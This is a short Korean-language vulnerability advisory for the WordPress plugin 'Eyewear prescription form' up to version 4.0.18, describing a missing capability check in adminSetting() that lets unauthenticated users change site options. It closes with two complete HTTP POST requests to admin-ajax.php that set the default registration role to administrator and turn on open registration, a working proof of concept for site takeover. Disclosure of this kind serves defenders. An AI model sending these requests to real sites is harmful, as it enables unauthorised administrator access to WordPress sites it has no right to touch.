
안경 처방전 양식 <= 4.0.18 - 인증 누락으로 인한 인증되지 않은 임의 옵션 업데이트
Eyewear prescription form <= 4.0.18 - 인증되지 않은 임의 옵션 업데이트로의 권한 누락
WordPress용 Eyewear prescription form 플러그인은 4.0.18 이하의 모든 버전에서 adminSetting() 함수에 대한 기능 검사 누락으로 인해 권한 상승으로 이어질 수 있는 무단 데이터 수정에 취약합니다. 이를 통해 인증되지 않은 공격자가 WordPress 사이트의 임의 옵션을 업데이트할 수 있습니다. 이 취약점을 악용하여 등록 기본 역할을 관리자로 변경하고 사용자 등록을 활성화하여 공격자가 취약한 사이트에 대한 관리자 사용자 액세스 권한을 얻을 수 있습니다.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=default_role&data[settingValue]=administrator
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=users_can_register&data[settingValue]=1